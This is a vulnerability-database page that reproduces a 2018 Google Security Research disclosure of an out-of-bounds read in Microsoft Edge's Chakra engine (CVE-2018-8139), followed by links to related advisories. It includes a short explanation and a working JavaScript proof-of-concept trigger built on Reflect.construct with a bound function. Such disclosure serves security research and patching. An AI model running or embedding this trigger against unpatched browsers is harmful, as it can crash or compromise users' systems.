Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
zdtGoogle Security Research1337DAY-ID-30707
HistoryJul 12, 2018 - 12:00 a.m.

Microsoft Edge Chakra JIT - BoundFunction::NewInstance Out-of-Bounds Read Exploit

2018-07-1200:00:00
Google Security Research
0day.today
14

0.966 High

EPSS

Percentile

99.5%

JSON

Exploit for windows platform in category dos / poc

/*
BoundFunction::NewInstance is used to handle calls to a bound function. The method first allocates a new argument array and copies the prepended arguments and others into the new argument array and calls the actual function. The problem is, it doesn't care about the CallFlags_ExtraArg flag which indicates that there's an extra argument (new.target in the PoC) at the end of the argument array. So the size of the new argument array created with the CallFlags_ExtraArg flag will be always 1 less then required, this leads to an OOB read.
 
PoC:
*/
 
function func() {
    new.target.x;
}
 
let bound = func.bind({}, 1);
 
Reflect.construct(bound, []);

#  0day.today [2018-07-13]  #

Related

packetstorm 1
symantec 1
checkpoint_advisories 1
mscve 1
veracode 8
prion 12
osv 14
cve 12
github 6
kaspersky 1
mskb 1
openvas 1
nessus 1
trendmicroblog 1
talosblog 1
packetstorm
packetstorm
Microsoft Edge Chakra JIT BoundFunction::NewInstance Bug
2018-07-12 00:00:00
symantec
symantec
Microsoft Edge CVE-2018-8139 Remote Memory Corruption Vulnerability
2018-05-08 00:00:00
checkpoint_advisories
checkpoint_advisories
Microsoft Edge Out Of Bounds Read (CVE-2018-8139)
2018-07-12 00:00:00
mscve
mscve
Scripting Engine Memory Corruption Vulnerability
2018-05-08 07:00:00
veracode
veracode
Remote Code Execution (RCE)
2018-06-29 04:40:18
Remote Code Execution (RCE)
2018-06-28 06:40:19
Remote Code Execution (RCE)
2018-06-29 04:27:26
prion
prion
Remote code execution
2018-05-09 19:29:00
Remote code execution
2018-05-09 19:29:00
Remote code execution
2018-05-09 19:29:00
osv
osv
ChakraCore RCE Vulnerability
2022-05-13 01:18:39
CVE-2018-0946
2018-05-09 19:29:00
CVE-2018-0954
2018-05-09 19:29:00
cve
cve
CVE-2018-8139
2018-05-09 19:29:00
CVE-2018-8122
2018-05-09 19:29:00
CVE-2018-0945
2018-05-09 19:29:00
github
github
ChakraCore RCE Vulnerability
2022-05-13 01:18:49
ChakraCore RCE Vulnerability
2022-05-13 01:18:39
ChakraCore RCE Vulnerability
2022-05-13 01:18:39
kaspersky
kaspersky
KLA11247 Multiple vulnerabilities in Microsoft Browsers
2018-05-08 00:00:00
mskb
mskb
May 8, 2018—KB4103721 (OS Build 17134.48)
2018-05-08 07:00:00
openvas
openvas
Microsoft Windows Multiple Vulnerabilities (KB4103721)
2018-05-09 00:00:00
nessus
nessus
KB4103721: Windows 10 Version 1803 and Windows Server Version 1803 May 2018 Security Update
2018-05-08 00:00:00
trendmicroblog
trendmicroblog
TippingPoint Threat Intelligence and Zero-Day Coverage – Week of May 7, 2018
2018-05-11 15:37:20
talosblog
talosblog
Microsoft Patch Tuesday - May 2018
2018-05-08 12:02:00

0.966 High

EPSS

Percentile

99.5%

JSON
Related for 1337DAY-ID-30707
packetstorm1symantec1checkpoint_advisories1mscve1veracode8prion12osv14cve12github6kaspersky1mskb1openvas1nessus1trendmicroblog1talosblog1